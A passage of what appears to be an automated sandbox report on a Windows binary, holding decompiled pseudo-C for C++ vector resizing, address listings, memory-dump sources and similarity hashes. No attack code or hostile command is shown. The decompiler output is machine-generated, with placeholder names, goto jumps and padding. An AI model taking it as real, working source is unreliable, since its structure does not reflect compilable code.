                                                                                                                                                                    										E004EE38E("vector<T> too long");
                                                                                                                                                                    									}
                                                                                                                                                                    									__eflags = _t538 - _t721;
                                                                                                                                                                    									if(_t538 >= _t721) {
                                                                                                                                                                    										L136:
                                                                                                                                                                    										_t481 =  *(_t749 + 0x18);
                                                                                                                                                                    										goto L137;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										__eflags = _t721;
                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                    											L133:
                                                                                                                                                                    											E004EF0C0(0,  *(_t745 + 0x68), ( *(_t745 + 0x6c) -  *(_t745 + 0x68) >> 2) * 4);
                                                                                                                                                                    											_t382 =  *(_t745 + 0x68);
                                                                                                                                                                    											_t749 = _t749 + 0xc;
                                                                                                                                                                    											_t681 =  *(_t745 + 0x6c) - _t382 >> 2;
                                                                                                                                                                    											__eflags = _t382;
                                                                                                                                                                    											if(_t382 != 0) {
                                                                                                                                                                    												_push(_t382);
                                                                                                                                                                    												L004EEDBE();
                                                                                                                                                                    												_t749 = _t749 + 4;
                                                                                                                                                                    											}
                                                                                                                                                                    											_t610 =  *(_t749 + 0x14);
                                                                                                                                                                    											 *((intOrPtr*)(_t745 + 0x70)) = 0 + _t721 * 4;
                                                                                                                                                                    											 *(_t745 + 0x6c) = 0 + _t681 * 4;
                                                                                                                                                                    											 *(_t745 + 0x68) = 0;
                                                                                                                                                                    											goto L136;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											_push(_t721 * 4);
                                                                                                                                                                    											_t481 = L004EF8DA(0, _t721 * 4, _t610, _t678, _t721, __eflags);
                                                                                                                                                                    											_t749 = _t749 + 4;
                                                                                                                                                                    											__eflags = _t481;
                                                                                                                                                                    											if(_t481 == 0) {
                                                                                                                                                                    												 *(_t749 + 0x20) = 0;
                                                                                                                                                                    												 *(_t749 + 0x1c) = 0x52fd98;
                                                                                                                                                                    												_t706 = _t749 + 0x1c;
                                                                                                                                                                    												 *((intOrPtr*)(_t749 + 0x3c)) = 3;
                                                                                                                                                                    												_t336 = E00404190(_t706);
                                                                                                                                                                    												goto L144;
                                                                                                                                                                    											} else {
                                                                                                                                                                    												goto L133;
                                                                                                                                                                    											}
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t722 = _t705 + _t610 * 4;
                                                                                                                                                                    							if(_t722 != _t510) {
                                                                                                                                                                    								_t682 = (_t510 - _t510 >> 2) * 4;
                                                                                                                                                                    								E004EF0C0(_t722, _t510, _t682);
                                                                                                                                                                    								_t749 = _t749 + 0xc;
                                                                                                                                                                    								 *(_t745 + 0x6c) = _t722 + _t682;
                                                                                                                                                                    							}
                                                                                                                                                                    							L140:
                                                                                                                                                                    							_t511 =  *(_t745 + 0x7c);
                                                                                                                                                                    							_t706 =  *(_t745 + 0x78);
                                                                                                                                                                    							_t610 =  *(_t481 - 0x18);
                                                                                                                                                                    							_t336 = _t511 - _t706 >> 2;
                                                                                                                                                                    							 *(_t749 + 0x14) = _t610;
                                                                                                                                                                    							if(_t336 <= _t610) {
                                                                                                                                                                    								L144:
                                                                                                                                                                    								if(__eflags >= 0) {
                                                                                                                                                                    									goto L165;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t517 = _t610 - _t336;
                                                                                                                                                                    									__eflags = 0x3fffffff - _t517 - _t336;
                                                                                                                                                                    									if(0x3fffffff - _t517 < _t336) {
                                                                                                                                                                    										_t336 = E004EE38E("vector<T> too long");
                                                                                                                                                                    									}
                                                                                                                                                                    									_t343 = _t336 + _t517;
                                                                                                                                                                    									_t520 =  *((intOrPtr*)(_t745 + 0x80)) - _t706 >> 2;
                                                                                                                                                                    									__eflags = _t343 - _t520;
                                                                                                                                                                    									if(_t343 <= _t520) {
                                                                                                                                                                    										L162:
                                                                                                                                                                    										_t668 =  *(_t745 + 0x7c);
                                                                                                                                                                    										_t522 = _t610 - (_t668 -  *(_t745 + 0x78) >> 2);
                                                                                                                                                                    										__eflags = _t522;
                                                                                                                                                                    										if(_t522 != 0) {
                                                                                                                                                                    											__eflags = 0;
                                                                                                                                                                    											memset(_t668, 0, _t522 << 2);
                                                                                                                                                                    											_t749 = _t749 + 0xc;
                                                                                                                                                                    										}
                                                                                                                                                                    										_t347 =  *(_t745 + 0x7c);
                                                                                                                                                                    										_t612 = _t610 - (_t347 -  *(_t745 + 0x78) >> 2);
                                                                                                                                                                    										__eflags = _t612;
                                                                                                                                                                    										_t610 = _t347 + _t612 * 4;
                                                                                                                                                                    										 *(_t745 + 0x7c) = _t347 + _t612 * 4;
                                                                                                                                                                    										goto L165;
                                                                                                                                                                    									} else {
                                                                                                                                                                    										_t670 = _t520;
                                                                                                                                                                    										_t711 = _t670 >> 1;
                                                                                                                                                                    										__eflags = 0x3fffffff - _t711 - _t670;
                                                                                                                                                                    										if(0x3fffffff - _t711 >= _t670) {
                                                                                                                                                                    											_t671 = _t670 + _t711;
                                                                                                                                                                    											__eflags = _t671;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											_t671 = 0;
                                                                                                                                                                    										}
                                                                                                                                                                    										__eflags = _t671 - _t343;
                                                                                                                                                                    										if(_t671 < _t343) {
                                                                                                                                                                    											_t671 = _t343;
                                                                                                                                                                    										}
                                                                                                                                                                    										__eflags = _t671 - 0x3fffffff;
                                                                                                                                                                    										if(_t671 > 0x3fffffff) {
                                                                                                                                                                    											E004EE38E("vector<T> too long");
                                                                                                                                                                    										}
                                                                                                                                                                    										__eflags = _t520 - _t671;
                                                                                                                                                                    										if(_t520 >= _t671) {
                                                                                                                                                                    											L161:
                                                                                                                                                                    											_t481 =  *(_t749 + 0x18);
                                                                                                                                                                    											goto L162;
                                                                                                                                                                    										} else {
                                                                                                                                                                    											_t485 = 0;
                                                                                                                                                                    											__eflags = _t671;
                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                    												L158:
                                                                                                                                                                    												E004EF0C0(_t485,  *(_t745 + 0x78), ( *(_t745 + 0x7c) -  *(_t745 + 0x78) >> 2) + ( *(_t745 + 0x7c) -  *(_t745 + 0x78) >> 2) + ( *(_t745 + 0x7c) -  *(_t745 + 0x78) >> 2) + ( *(_t745 + 0x7c) -  *(_t745 + 0x78) >> 2));
                                                                                                                                                                    												_t352 =  *(_t745 + 0x78);
                                                                                                                                                                    												_t749 = _t749 + 0xc;
                                                                                                                                                                    												_t714 =  *(_t745 + 0x7c) - _t352 >> 2;
                                                                                                                                                                    												__eflags = _t352;
                                                                                                                                                                    												if(_t352 != 0) {
                                                                                                                                                                    													_push(_t352);
                                                                                                                                                                    													L004EEDBE();
                                                                                                                                                                    													_t749 = _t749 + 4;
                                                                                                                                                                    												}
                                                                                                                                                                    												 *((intOrPtr*)(_t745 + 0x80)) = _t485 + _t671 * 4;
                                                                                                                                                                    												_t610 =  *(_t749 + 0x14);
                                                                                                                                                                    												 *(_t745 + 0x7c) = _t485 + _t714 * 4;
                                                                                                                                                                    												 *(_t745 + 0x78) = _t485;
                                                                                                                                                                    												goto L161;
                                                                                                                                                                    											} else {
                                                                                                                                                                    												_push(_t671 * 4);
                                                                                                                                                                    												_t485 = L004EF8DA(0, _t520, _t610, _t671, _t711, __eflags);
                                                                                                                                                                    												_t749 = _t749 + 4;
                                                                                                                                                                    												__eflags = _t485;
                                                                                                                                                                    												if(_t485 == 0) {
                                                                                                                                                                    													 *(_t749 + 0x28) = 0;
                                                                                                                                                                    													 *(_t749 + 0x24) = 0x52fd98;
                                                                                                                                                                    													_t715 = _t749 + 0x24;
                                                                                                                                                                    													 *((intOrPtr*)(_t749 + 0x3c)) = 4;
                                                                                                                                                                    													_t357 = E00404190(_t715);
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													asm("int3");
                                                                                                                                                                    													_t751 = _t749 - 8;
                                                                                                                                                                    													__eflags =  *((intOrPtr*)(_t357 + 0x14)) - 0x10;
                                                                                                                                                                    													if(__eflags >= 0) {
                                                                                                                                                                    														_t357 =  *_t357;
                                                                                                                                                                    													}
                                                                                                                                                                    													_push(_t715);
                                                                                                                                                                    													_t716 = _t520;
                                                                                                                                                                    													 *((intOrPtr*)(_t751 + 8)) = _t357;
                                                                                                                                                                    													L00482B80(_t716 + 0xa8, _t751 + 4, __eflags, _t751 + 0xc, _t751 + 4);
                                                                                                                                                                    													_t360 =  *((intOrPtr*)(_t751 + 8));
                                                                                                                                                                    													__eflags = _t360 -  *((intOrPtr*)(_t716 + 0xac));
                                                                                                                                                                    													if(_t360 ==  *((intOrPtr*)(_t716 + 0xac))) {
                                                                                                                                                                    														L173:
                                                                                                                                                                    														 *_t671 =  *0x55ff0c;
                                                                                                                                                                    														 *((intOrPtr*)(_t671 + 4)) =  *0x55ff10;
                                                                                                                                                                    														return _t671;
                                                                                                                                                                    													} else {
                                                                                                                                                                    														_t363 = _t360 + 0xc;
                                                                                                                                                                    														__eflags = _t363;
                                                                                                                                                                    														if(_t363 != 0) {
                                                                                                                                                                    															 *((intOrPtr*)(_t671 + 4)) =  *((intOrPtr*)(_t363 + 4));
                                                                                                                                                                    															 *_t671 =  *_t363;
                                                                                                                                                                    															return _t671;
                                                                                                                                                                    														} else {
                                                                                                                                                                    															goto L173;
                                                                                                                                                                    														}
                                                                                                                                                                    													}
                                                                                                                                                                    												} else {
                                                                                                                                                                    													goto L158;
                                                                                                                                                                    												}
                                                                                                                                                                    											}
                                                                                                                                                                    										}
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_t718 = _t706 + _t610 * 4;
                                                                                                                                                                    								if(_t718 != _t511) {
                                                                                                                                                                    									_t672 = (_t511 - _t511 >> 2) * 4;
                                                                                                                                                                    									E004EF0C0(_t718, _t511, _t672);
                                                                                                                                                                    									_t749 = _t749 + 0xc;
                                                                                                                                                                    									 *(_t745 + 0x7c) = _t718 + _t672;
                                                                                                                                                                    								}
                                                                                                                                                                    								L165:
                                                                                                                                                                    								L0047FCD0( *(_t481 - 0x14), _t745 + 0x88);
                                                                                                                                                                    								L0047FCD0( *(_t481 - 0x10), _t745 + 0x98);
                                                                                                                                                                    								_t341 =  *(_t745 + 0x114);
                                                                                                                                                                    								if( *((intOrPtr*)(_t745 + 0x110)) != _t341) {
                                                                                                                                                                    									 *(_t745 + 0x114) = _t341;
                                                                                                                                                                    								}
                                                                                                                                                                    								 *[fs:0x0] =  *((intOrPtr*)(_t749 + 0x34));
                                                                                                                                                                    								_pop(_t665);
                                                                                                                                                                    								_pop(_t709);
                                                                                                                                                                    								_pop(_t482);
                                                                                                                                                                    								return L004EEDC9(_t341, _t482,  *(_t749 + 0x18) ^ _t749, _t610, _t665, _t709);
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}

                                                                                                                                                                    0x0046f4f4
                                                                                                                                                                    0x0046f500
                                                                                                                                                                    0x0046f504
                                                                                                                                                                    0x0046f50a
                                                                                                                                                                    0x0046f50e
                                                                                                                                                                    0x0046f510
                                                                                                                                                                    0x0046f516
                                                                                                                                                                    0x0046f51c
                                                                                                                                                                    0x0046f546
                                                                                                                                                                    0x0046f546
                                                                                                                                                                    0x0046f546
                                                                                                                                                                    0x0046f548
                                                                                                                                                                    0x0046f54c
                                                                                                                                                                    0x0046f54c
                                                                                                                                                                    0x0046f54f
                                                                                                                                                                    0x0046f555
                                                                                                                                                                    0x0046f567
                                                                                                                                                                    0x0046f569
                                                                                                                                                                    0x0046f570
                                                                                                                                                                    0x0046f576
                                                                                                                                                                    0x0046f57a
                                                                                                                                                                    0x0046f57d
                                                                                                                                                                    0x0046f57f
                                                                                                                                                                    0x0046f582
                                                                                                                                                                    0x0046f582
                                                                                                                                                                    0x0046f584
                                                                                                                                                                    0x0046f585
                                                                                                                                                                    0x0046f585
                                                                                                                                                                    0x0046f58b
                                                                                                                                                                    0x0046f58d
                                                                                                                                                                    0x0046f592
                                                                                                                                                                    0x0046f594
                                                                                                                                                                    0x0046f596
                                                                                                                                                                    0x0046f59f
                                                                                                                                                                    0x0046f5a0
                                                                                                                                                                    0x0046f5a2
                                                                                                                                                                    0x0046f5a2
                                                                                                                                                                    0x0046f5b2
                                                                                                                                                                    0x0046f5c3
                                                                                                                                                                    0x0046f5c6
                                                                                                                                                                    0x0046f5c6
                                                                                                                                                                    0x0046f5c8
                                                                                                                                                                    0x0046f5ca
                                                                                                                                                                    0x0046f5ca
                                                                                                                                                                    0x0046f5ca
                                                                                                                                                                    0x0046f5d0
                                                                                                                                                                    0x0046f5d5
                                                                                                                                                                    0x0046f5d7
                                                                                                                                                                    0x0046f5da
                                                                                                                                                                    0x0046f5e3
                                                                                                                                                                    0x0046f5e3
                                                                                                                                                                    0x0046f5e3
                                                                                                                                                                    0x0046f5e5
                                                                                                                                                                    0x0046f5e8
                                                                                                                                                                    0x0046f5ec
                                                                                                                                                                    0x0046f5ef
                                                                                                                                                                    0x0046f60e
                                                                                                                                                                    0x0046f610
                                                                                                                                                                    0x0046f614
                                                                                                                                                                    0x0046f614
                                                                                                                                                                    0x0046f5f1
                                                                                                                                                                    0x0046f5f1
                                                                                                                                                                    0x0046f5f3
                                                                                                                                                                    0x0046f609
                                                                                                                                                                    0x0046f5f5
                                                                                                                                                                    0x0046f5f8
                                                                                                                                                                    0x0046f600
                                                                                                                                                                    0x0046f600
                                                                                                                                                                    0x0046f5f3
                                                                                                                                                                    0x0046f616
                                                                                                                                                                    0x0046f619
                                                                                                                                                                    0x0046f620
                                                                                                                                                                    0x0046f627
                                                                                                                                                                    0x0046f628
                                                                                                                                                                    0x0046f62b
                                                                                                                                                                    0x0046f630
                                                                                                                                                                    0x0046f633
                                                                                                                                                                    0x0046f633
                                                                                                                                                                    0x0046f633
                                                                                                                                                                    0x0046f633
                                                                                                                                                                    0x0046f63a
                                                                                                                                                                    0x0046f63a
                                                                                                                                                                    0x0046f55b
                                                                                                                                                                    0x0046f55d
                                                                                                                                                                    0x0046f55d
                                                                                                                                                                    0x0046f654
                                                                                                                                                                    0x0046f658
                                                                                                                                                                    0x0046f65e
                                                                                                                                                                    0x0046f520
                                                                                                                                                                    0x0046f524
                                                                                                                                                                    0x0046f533
                                                                                                                                                                    0x0046f538
                                                                                                                                                                    0x0046f53c
                                                                                                                                                                    0x0046f540
                                                                                                                                                                    0x0046f544
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0046f544
                                                                                                                                                                    0x0046f65e
                                                                                                                                                                    0x0046f674
                                                                                                                                                                    0x0046f67a
                                                                                                                                                                    0x0046f67e
                                                                                                                                                                    0x0046f680
                                                                                                                                                                    0x0046f686
                                                                                                                                                                    0x0046f690
                                                                                                                                                                    0x0046f6a3
                                                                                                                                                                    0x0046f6a8
                                                                                                                                                                    0x0046f6ac
                                                                                                                                                                    0x0046f6b0
                                                                                                                                                                    0x0046f6b4
                                                                                                                                                                    0x0046f6b6
                                                                                                                                                                    0x0046f6b6
                                                                                                                                                                    0x0046f6b8
                                                                                                                                                                    0x0046f6b6
                                                                                                                                                                    0x0046f6bc
                                                                                                                                                                    0x0046f6bf
                                                                                                                                                                    0x0046f6c5
                                                                                                                                                                    0x0046f6d7
                                                                                                                                                                    0x0046f6d9
                                                                                                                                                                    0x0046f6e0
                                                                                                                                                                    0x0046f6e6
                                                                                                                                                                    0x0046f6ea
                                                                                                                                                                    0x0046f6ed
                                                                                                                                                                    0x0046f6ef
                                                                                                                                                                    0x0046f6f2
                                                                                                                                                                    0x0046f6f2
                                                                                                                                                                    0x0046f6f4
                                                                                                                                                                    0x0046f6f5
                                                                                                                                                                    0x0046f6f5
                                                                                                                                                                    0x0046f6fb
                                                                                                                                                                    0x0046f6fd
                                                                                                                                                                    0x0046f702
                                                                                                                                                                    0x0046f704
                                                                                                                                                                    0x0046f706
                                                                                                                                                                    0x0046f70f
                                                                                                                                                                    0x0046f710
                                                                                                                                                                    0x0046f712
                                                                                                                                                                    0x0046f712
                                                                                                                                                                    0x0046f722
                                                                                                                                                                    0x0046f733
                                                                                                                                                                    0x0046f736
                                                                                                                                                                    0x0046f736
                                                                                                                                                                    0x0046f738
                                                                                                                                                                    0x0046f73a
                                                                                                                                                                    0x0046f73a
                                                                                                                                                                    0x0046f73a
                                                                                                                                                                    0x0046f740
                                                                                                                                                                    0x0046f745
                                                                                                                                                                    0x0046f747
                                                                                                                                                                    0x0046f74a
                                                                                                                                                                    0x0046f753
                                                                                                                                                                    0x0046f753
                                                                                                                                                                    0x0046f753
                                                                                                                                                                    0x0046f755
                                                                                                                                                                    0x0046f758
                                                                                                                                                                    0x0046f75c
                                                                                                                                                                    0x0046f75f
                                                                                                                                                                    0x0046f77e
                                                                                                                                                                    0x0046fade
                                                                                                                                                                    0x0046fae3
                                                                                                                                                                    0x0046fae3
                                                                                                                                                                    0x0046fae6
                                                                                                                                                                    0x0046faf0
                                                                                                                                                                    0x0046faf6
                                                                                                                                                                    0x0046fafc
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0046fa8b
                                                                                                                                                                    0x0046fa92
                                                                                                                                                                    0x0046fa98
                                                                                                                                                                    0x0046fa9a
                                                                                                                                                                    0x0046fa9d
                                                                                                                                                                    0x0046fa9f
                                                                                                                                                                    0x0046fc42
                                                                                                                                                                    0x0046fc4a
                                                                                                                                                                    0x0046fc52
                                                                                                                                                                    0x0046fc56
                                                                                                                                                                    0x0046fc5e
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0046fa9f
                                                                                                                                                                    0x0046fa89
                                                                                                                                                                    0x0046fa83
                                                                                                                                                                    0x0046fa4c
                                                                                                                                                                    0x0046f9cc
                                                                                                                                                                    0x0046f9cc
                                                                                                                                                                    0x0046f9d1
                                                                                                                                                                    0x0046f9de
                                                                                                                                                                    0x0046f9e8
                                                                                                                                                                    0x0046f9ed
                                                                                                                                                                    0x0046f9f2
                                                                                                                                                                    0x0046f9f2
                                                                                                                                                                    0x0046fb39
                                                                                                                                                                    0x0046fb39
                                                                                                                                                                    0x0046fb46
                                                                                                                                                                    0x0046fb59
                                                                                                                                                                    0x0046fb64
                                                                                                                                                                    0x0046fb67
                                                                                                                                                                    0x0046fb6a
                                                                                                                                                                    0x0046fb6f
                                                                                                                                                                    0x0046fb71
                                                                                                                                                                    0x0046fb73
                                                                                                                                                                    0x0046fb78
                                                                                                                                                                    0x0046fb80
                                                                                                                                                                    0x0046fb80
                                                                                                                                                                    0x0046fb82
                                                                                                                                                                    0x0046fb8f
                                                                                                                                                                    0x0046fb95
                                                                                                                                                                    0x0046fb98
                                                                                                                                                                    0x0046fb9e
                                                                                                                                                                    0x0046fba0
                                                                                                                                                                    0x0046fba2
                                                                                                                                                                    0x0046fba7
                                                                                                                                                                    0x0046fbaa
                                                                                                                                                                    0x0046fbaf
                                                                                                                                                                    0x0046fbb0
                                                                                                                                                                    0x0046fbb5
                                                                                                                                                                    0x0046fbb9
                                                                                                                                                                    0x0046fbb9
                                                                                                                                                                    0x0046fbbc
                                                                                                                                                                    0x0046fbcc
                                                                                                                                                                    0x0046fbd4
                                                                                                                                                                    0x0046fbdf
                                                                                                                                                                    0x0046fbe0
                                                                                                                                                                    0x0046fbf1
                                                                                                                                                                    0x0046fbf5
                                                                                                                                                                    0x0046fbf8
                                                                                                                                                                    0x0046fbfc
                                                                                                                                                                    0x0046fbff
                                                                                                                                                                    0x0046fc02
                                                                                                                                                                    0x0046fc09
                                                                                                                                                                    0x0046fc0c
                                                                                                                                                                    0x0046fc12
                                                                                                                                                                    0x0046fc63
                                                                                                                                                                    0x0046fc63
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0046fc69
                                                                                                                                                                    0x0046fc6b
                                                                                                                                                                    0x0046fc74
                                                                                                                                                                    0x0046fc76
                                                                                                                                                                    0x0046fc7d
                                                                                                                                                                    0x0046fc7d
                                                                                                                                                                    0x0046fc82
                                                                                                                                                                    0x0046fc89
                                                                                                                                                                    0x0046fc8c
                                                                                                                                                                    0x0046fc8e
                                                                                                                                                                    0x0046fd33
                                                                                                                                                                    0x0046fd33
                                                                                                                                                                    0x0046fd40
                                                                                                                                                                    0x0046fd40
                                                                                                                                                                    0x0046fd42
                                                                                                                                                                    0x0046fd44
                                                                                                                                                                    0x0046fd46
                                                                                                                                                                    0x0046fd46
                                                                                                                                                                    0x0046fd46
                                                                                                                                                                    0x0046fd48
                                                                                                                                                                    0x0046fd53
                                                                                                                                                                    0x0046fd53
                                                                                                                                                                    0x0046fd58
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0046fc94
                                                                                                                                                                    0x0046fc94
                                                                                                                                                                    0x0046fc98
                                                                                                                                                                    0x0046fca1
                                                                                                                                                                    0x0046fca3
                                                                                                                                                                    0x0046fca9
                                                                                                                                                                    0x0046fca9
                                                                                                                                                                    0x0046fca5
                                                                                                                                                                    0x0046fca5
                                                                                                                                                                    0x0046fca5
                                                                                                                                                                    0x0046fcab
                                                                                                                                                                    0x0046fcad
                                                                                                                                                                    0x0046fcaf
                                                                                                                                                                    0x0046fcaf
                                                                                                                                                                    0x0046fcb1
                                                                                                                                                                    0x0046fcb7
                                                                                                                                                                    0x0046fcbe
                                                                                                                                                                    0x0046fcbe
                                                                                                                                                                    0x0046fcc3
                                                                                                                                                                    0x0046fcc5
                                                                                                                                                                    0x0046fd2f
                                                                                                                                                                    0x0046fd2f
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0046fcc7
                                                                                                                                                                    0x0046fcc9
                                                                                                                                                                    0x0046fccb
                                                                                                                                                                    0x0046fce7
                                                                                                                                                                    0x0046fcfc
                                                                                                                                                                    0x0046fd01
                                                                                                                                                                    0x0046fd09
                                                                                                                                                                    0x0046fd0c
                                                                                                                                                                    0x0046fd0f
                                                                                                                                                                    0x0046fd11
                                                                                                                                                                    0x0046fd13
                                                                                                                                                                    0x0046fd14
                                                                                                                                                                    0x0046fd19
                                                                                                                                                                    0x0046fd19
                                                                                                                                                                    0x0046fd1c
                                                                                                                                                                    0x0046fd26
                                                                                                                                                                    0x0046fd29
                                                                                                                                                                    0x0046fd2c
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0046fccd
                                                                                                                                                                    0x0046fcd4
                                                                                                                                                                    0x0046fcda
                                                                                                                                                                    0x0046fcdc
                                                                                                                                                                    0x0046fcdf
                                                                                                                                                                    0x0046fce1
                                                                                                                                                                    0x0046fda1
                                                                                                                                                                    0x0046fda9
                                                                                                                                                                    0x0046fdb1
                                                                                                                                                                    0x0046fdb5
                                                                                                                                                                    0x0046fdbd
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                    • API String ID: 4104443479-3788999226
                                                                                                                                                                    • Opcode ID: f9e87e0ba29f0d1135848d1733719e4a1e5762b55f3bd5655fdf58d46fc8d428
                                                                                                                                                                    • Instruction ID: d0d6cdf60a9ef9b4368b497eaac4b4b49dba12012e7857ce0edd8c25d089ac67
                                                                                                                                                                    • Opcode Fuzzy Hash: f9e87e0ba29f0d1135848d1733719e4a1e5762b55f3bd5655fdf58d46fc8d428
                                                                                                                                                                    • Instruction Fuzzy Hash: 7C62C4716002058FCB28DF29D9915AE77E1BB88314F14463EEC9697395FB34EE09CB86
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                    			E00478010(unsigned int __ecx, void* __edx) {
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t384;
                                                                                                                                                                    				signed int _t386;
                                                                                                                                                                    				unsigned int _t389;
                                                                                                                                                                    				unsigned int _t391;
                                                                                                                                                                    				void* _t398;
                                                                                                                                                                    				intOrPtr _t405;
                                                                                                                                                                    				signed int _t408;
                                                                                                                                                                    				signed int _t411;
                                                                                                                                                                    				unsigned int _t416;
                                                                                                                                                                    				unsigned int _t422;
                                                                                                                                                                    				intOrPtr* _t430;
                                                                                                                                                                    				intOrPtr* _t433;
                                                                                                                                                                    				intOrPtr* _t436;
                                                                                                                                                                    				intOrPtr* _t439;
                                                                                                                                                                    				intOrPtr _t446;
                                                                                                                                                                    				signed int _t448;
                                                                                                                                                                    				intOrPtr* _t452;
                                                                                                                                                                    				intOrPtr* _t454;
                                                                                                                                                                    				intOrPtr* _t457;
                                                                                                                                                                    				intOrPtr* _t460;
                                                                                                                                                                    				intOrPtr _t466;
                                                                                                                                                                    				signed int _t475;
                                                                                                                                                                    				signed int _t476;
                                                                                                                                                                    				signed int _t478;
                                                                                                                                                                    				signed int _t479;
                                                                                                                                                                    				signed int _t486;
                                                                                                                                                                    				signed int _t487;
                                                                                                                                                                    				signed int _t489;
                                                                                                                                                                    				signed int _t493;
                                                                                                                                                                    				signed int _t495;
                                                                                                                                                                    				signed int _t496;
                                                                                                                                                                    				signed int _t503;
                                                                                                                                                                    				signed int _t504;
                                                                                                                                                                    				unsigned int _t506;
                                                                                                                                                                    				void* _t510;
                                                                                                                                                                    				unsigned int _t511;
                                                                                                                                                                    				signed int _t512;
                                                                                                                                                                    				signed int _t514;
                                                                                                                                                                    				signed int _t515;
                                                                                                                                                                    				unsigned int _t518;
                                                                                                                                                                    				signed int _t520;
                                                                                                                                                                    				signed int _t521;
                                                                                                                                                                    				signed int _t526;
                                                                                                                                                                    				unsigned int _t527;
                                                                                                                                                                    				signed int _t528;
                                                                                                                                                                    				signed int _t530;
                                                                                                                                                                    				signed int _t531;
                                                                                                                                                                    				unsigned int _t534;
                                                                                                                                                                    				signed int _t536;
                                                                                                                                                                    				signed int _t537;
                                                                                                                                                                    				unsigned int _t541;
                                                                                                                                                                    				signed int _t542;
                                                                                                                                                                    				void* _t545;
                                                                                                                                                                    				signed int _t547;
                                                                                                                                                                    				unsigned int* _t548;
                                                                                                                                                                    				signed int _t559;
                                                                                                                                                                    				signed int _t560;
                                                                                                                                                                    				void* _t561;
                                                                                                                                                                    				signed int _t562;
                                                                                                                                                                    				intOrPtr* _t564;
                                                                                                                                                                    				unsigned int _t565;
                                                                                                                                                                    				unsigned int _t583;
                                                                                                                                                                    				intOrPtr _t585;
                                                                                                                                                                    				intOrPtr _t587;
                                                                                                                                                                    				intOrPtr _t590;
                                                                                                                                                                    				void* _t592;
                                                                                                                                                                    				intOrPtr _t599;
                                                                                                                                                                    				intOrPtr _t600;
                                                                                                                                                                    				intOrPtr _t603;
                                                                                                                                                                    				void* _t605;
                                                                                                                                                                    				intOrPtr _t613;
                                                                                                                                                                    				unsigned int _t615;
                                                                                                                                                                    				intOrPtr _t620;
                                                                                                                                                                    				unsigned int _t623;
                                                                                                                                                                    				signed int _t624;
                                                                                                                                                                    				unsigned int _t630;
                                                                                                                                                                    				unsigned int _t632;
                                                                                                                                                                    				signed int _t633;
                                                                                                                                                                    				unsigned int _t635;
                                                                                                                                                                    				unsigned int _t638;
                                                                                                                                                                    				signed int _t639;
                                                                                                                                                                    				unsigned int _t642;
                                                                                                                                                                    				unsigned int _t644;
                                                                                                                                                                    				signed int _t645;
                                                                                                                                                                    				unsigned int _t647;
                                                                                                                                                                    				unsigned int _t650;
                                                                                                                                                                    				signed int _t651;
                                                                                                                                                                    				void* _t657;
                                                                                                                                                                    				void* _t664;
                                                                                                                                                                    				void* _t665;
                                                                                                                                                                    				void* _t666;
                                                                                                                                                                    				intOrPtr _t667;
                                                                                                                                                                    				void* _t674;
                                                                                                                                                                    				void* _t675;
                                                                                                                                                                    				intOrPtr _t676;
                                                                                                                                                                    				void* _t687;
                                                                                                                                                                    				intOrPtr _t689;
                                                                                                                                                                    				unsigned int _t691;
                                                                                                                                                                    				signed int _t695;
                                                                                                                                                                    				intOrPtr* _t696;
                                                                                                                                                                    				unsigned int _t698;
                                                                                                                                                                    				signed int _t705;
                                                                                                                                                                    				unsigned int _t707;
                                                                                                                                                                    				signed int _t711;
                                                                                                                                                                    				unsigned int _t713;
